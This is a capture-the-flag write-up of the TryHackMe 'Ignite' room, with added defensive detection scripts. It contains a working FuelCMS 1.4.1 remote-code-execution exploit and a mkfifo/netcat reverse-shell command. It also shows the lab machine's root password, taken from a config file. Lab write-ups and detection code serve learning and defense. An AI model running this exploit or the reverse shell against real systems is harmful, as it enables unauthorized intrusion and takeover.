Continuing the series of writeups on interesting TryHackMe challenges. The challenge I am writing up with you this time is Ignite.
A short writeup of the Ignite challenge
Nmap
The nmap scan shows two ports, but only port 80 is open; the other one is filtered, so we can ignore it. Let's find out what is running on port 80.
HTTP
I think this is a CMS I have not come across before, because I have never seen it used in any other vulnerable machine.
The nmap scan also shows a robots.txt file, and it contains several entries.
When I try to access /fuel, I am greeted by this login screen.
Since we don't have any credentials we can't log into the site, so we'll need to find another way in.
The first thing that comes to mind: is it the default login? And I was right, the login is admin:admin. But as it turns out, I don't need those credentials at all.
Change of plan: I look up fuel on searchsploit and find an RCE for version 1.4.1.
Next, download the exploit and change line 14 of the downloaded file to URL = "http://10.0.0.130/", i.e. the IP of the machine.
Here is the exploit (Python 2 code: it uses urllib.quote, and Python 2's input() evaluates what you type, which is why the command has to be entered in quotes):
import requests
import urllib

URL = "http://10.0.0.130/"  # base URL of the target; this is the line you change to the machine's IP


def find_nth_overlapping(haystack, needle, n):
    # Position of the n-th occurrence of needle in haystack; used below to cut
    # the duplicated page body off the end of the command output.
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start + 1)
        n -= 1
    return start


while 1:
    xxxx = input('cmd:')
    url = URL + "/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27" + urllib.quote(xxxx) + "%27%29%2b%27"
    r = requests.get(url)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    # The response contains the output followed by the normal page; keep only the first part.
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text, begin, 2)
    print(r.text[0:dup])
Run the exploit and enter your input at the prompt.
NOTE: Make sure the command is wrapped in "" when you type it at the prompt. For example, if you want to run ls, type cmd: "ls" and not cmd: ls. The command must be enclosed in quotation marks.
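From the defender's side, the request the exploit sends is easy to pick out of a web server's access log: the filter parameter of /fuel/pages/select/ carries percent-encoded PHP (a variable, a call to system, quotes glued together with +), none of which a legitimate page filter ever contains. The following detector is an added example, not part of the original writeup or of FuelCMS; the log lines it scans are constructed samples, and the first one uses the same URL-encoded payload shape shown in the exploit above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache-style access-log lines (not taken from any real target).
# Line 1 carries the same URL-encoded payload shape the exploit above sends to
# /fuel/pages/select/?filter=...; lines 2 and 3 are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%27%29%2b%27 HTTP/1.1" 200 5123 "-" "python-requests/2.31"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /fuel/pages/select/?filter=news HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /robots.txt HTTP/1.1" 200 30 "-" "Mozilla/5.0"
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Things a legitimate page filter never contains: PHP variables, calls to
# command-execution functions, or a quote immediately followed by string concatenation.
PHP_INJECTION_RE = re.compile(
    r"\$\w+|\b(?:system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\(|['\"]\s*\+",
    re.IGNORECASE,
)


def decoded_params(target: str) -> dict:
    """Return the query parameters of a request target, percent-decoded twice so
    that a double-encoded payload is inspected in its final form."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {k: [unquote(v) for v in vals] for k, vals in params.items()}


def scan_access_log(text: str, path_prefix: str = "/fuel/") -> list:
    """Flag requests under path_prefix whose query parameters look like injected PHP."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if not urlsplit(target).path.startswith(path_prefix):
            continue
        for name, values in decoded_params(target).items():
            for value in values:
                if PHP_INJECTION_RE.search(value):
                    findings.append({
                        "ip": m.group("ip"),
                        "ts": m.group("ts"),
                        "param": name,
                        "decoded": value,
                        "status": m.group("status"),
                    })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} param={f['param']} decoded={f['decoded']!r}")
```

The decoded value is what you want in the alert, not the raw URL: `'+pi(print($a='system'))+$a('ls')+'` tells an analyst at a glance which command was run, and a status of 200 on such a request means the injection most likely succeeded. Patching FuelCMS past 1.4.1 removes the bug itself; the log check is there to catch attempts and to find out whether an unpatched box was already hit.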
Since we already have RCE, getting a reverse shell is easy. Run the following command to get one:
cmd:"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4444 >/tmp/f"
This command gives you a reverse shell on your listener, which you start with nc -nlvp 4444.
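The reverse shell above is also a good illustration of what process monitoring should catch on the server: the web server user spawning a shell whose command line combines a named pipe, an interactive sh -i, and nc pointed at an outside address and port. The scorer below is an added example (mine, not from the writeup or any EDR product); it runs over constructed process-execution events in the shape an auditd or EDR execve record would give you once parsed.

```python
import re

# Constructed sample process-execution events (user + command line, as an EDR or
# auditd execve record would provide after parsing). Event 1201 is the shape of the
# fifo-and-nc reverse shell used in the writeup; the others are ordinary activity.
SAMPLE_EVENTS = [
    {"pid": 1201, "user": "www-data",
     "cmdline": "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4444 >/tmp/f"},
    {"pid": 1202, "user": "www-data", "cmdline": "/usr/sbin/apache2 -k start"},
    {"pid": 1203, "user": "alice", "cmdline": "nc -z localhost 80"},
    {"pid": 1204, "user": "www-data", "cmdline": "mkfifo /tmp/pipe"},
]

# Each indicator on its own is benign; it is the combination that matters.
INDICATORS = {
    "fifo": re.compile(r"\bmkfifo\b"),
    "interactive_shell": re.compile(r"\b(?:ba)?sh\s+-i\b"),
    # nc/ncat/netcat followed by optional flags, an IPv4 address and a port
    "network_tool": re.compile(r"\b(?:nc|ncat|netcat)\b\s+(?:-\S+\s+)*\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b"),
    "stderr_to_stdout": re.compile(r"2>&1"),
}

# Accounts that should never be launching interactive shells.
WEB_SERVER_USERS = {"www-data", "apache", "nginx", "http"}


def score_event(event: dict):
    """Return an alert dict for a reverse-shell-looking command line, else None."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    shell_plus_net = "interactive_shell" in hits and "network_tool" in hits
    fifo_plus_net = "fifo" in hits and "network_tool" in hits
    if not (shell_plus_net or fifo_plus_net):
        return None
    severity = "high" if event["user"] in WEB_SERVER_USERS else "medium"
    return {"pid": event["pid"], "user": event["user"], "severity": severity, "hits": hits}


def detect_reverse_shells(events: list) -> list:
    """Run score_event over a batch of events and keep the alerts."""
    alerts = []
    for ev in events:
        alert = score_event(ev)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect_reverse_shells(SAMPLE_EVENTS):
        print(f"pid={a['pid']} user={a['user']} severity={a['severity']} hits={','.join(a['hits'])}")
```

Requiring two indicators together keeps noise down (a lone mkfifo or a port check with nc -z does not fire), while the web server user raises severity because apache has no business running sh -i at all. Egress filtering from the web tier would have stopped this particular shell from connecting back in the first place.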
Now we can get the flag from the home directory.
Privilege escalation
Now that we are on the victim machine, let's run an enumeration script to see if we can find anything. You can use wget to pull the enum script from your own system onto the machine.
After searching for a while, I found the root password at: /var/www/html/fuel/application/config/database.php
root: mememe
Okay, we have the root user's password, so we can switch to root with su.
Then just grab the root flag from /root.
Summary
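The root of this privilege escalation is a plain-text database password sitting in a web-readable config file, belonging to a database account named root, and reused as the OS root password. Two of those three problems are visible to a simple audit. The script below is an added example (not from the writeup or from FuelCMS): it builds a constructed web root containing a fuel/application/config/database.php in the same shape as the real one, then walks the tree, pulls username and password from CodeIgniter-style config arrays, masks the secret, and reports files that are world-readable or that use root as the database user.

```python
import os
import re
import stat
import tempfile
import textwrap

# CodeIgniter/FuelCMS style entries:  'username' => 'root',  'password' => '...'
CRED_RE = re.compile(r"""['"](?P<key>username|password)['"]\s*=>\s*['"](?P<val>[^'"]*)['"]""")

# File names worth inspecting for credentials (assumed list, extend for your stack).
CONFIG_NAMES = ("database.php", "config.php", ".env", "wp-config.php")


def build_sample_tree() -> str:
    """Create a constructed web root with a sample database.php; returns its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    cfg_dir = os.path.join(root, "fuel", "application", "config")
    os.makedirs(cfg_dir)
    path = os.path.join(cfg_dir, "database.php")
    with open(path, "w") as fh:
        fh.write(textwrap.dedent("""\
            <?php
            $db['default'] = array(
                'hostname' => 'localhost',
                'username' => 'root',
                'password' => 'constructed-sample-password',
                'database' => 'fuel_schema',
            );
            """))
    os.chmod(path, 0o644)  # world-readable, the typical (bad) default
    return root


def mask(secret: str) -> str:
    """Keep the first two characters so findings can be matched without leaking the value."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def audit_config_secrets(webroot: str) -> list:
    """Find config files holding a database password and list the issues with each."""
    findings = []
    for dirpath, _, filenames in os.walk(webroot):
        for name in filenames:
            if name not in CONFIG_NAMES:
                continue
            path = os.path.join(dirpath, name)
            mode = os.stat(path).st_mode
            with open(path, errors="replace") as fh:
                creds = {m.group("key"): m.group("val") for m in CRED_RE.finditer(fh.read())}
            if "password" not in creds:
                continue
            issues = []
            if mode & stat.S_IROTH:
                issues.append("world-readable")
            if creds.get("username") == "root":
                issues.append("db user is root")
            if not creds["password"]:
                issues.append("empty password")
            findings.append({
                "file": os.path.relpath(path, webroot),
                "username": creds.get("username"),
                "password_masked": mask(creds["password"]),
                "mode": oct(stat.S_IMODE(mode)),
                "issues": issues,
            })
    return findings


if __name__ == "__main__":
    for f in audit_config_secrets(build_sample_tree()):
        print(f"{f['file']} user={f['username']} pw={f['password_masked']} mode={f['mode']} issues={f['issues']}")
```

Run it against the real document root instead of the sample tree to get the same report. The reuse of the database password as the OS root password is the one thing the script cannot see; the fix for that is the usual one: a dedicated low-privilege database user with its own password, and a config file readable only by the web server account.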
Ignite is a pretty good challenge for beginners from @Darkstar and @lollava. If you are a beginner then I recommend you to play the Ignite challenge.
Alternatively, you can also try the Shodan.io room on TryHackMe here.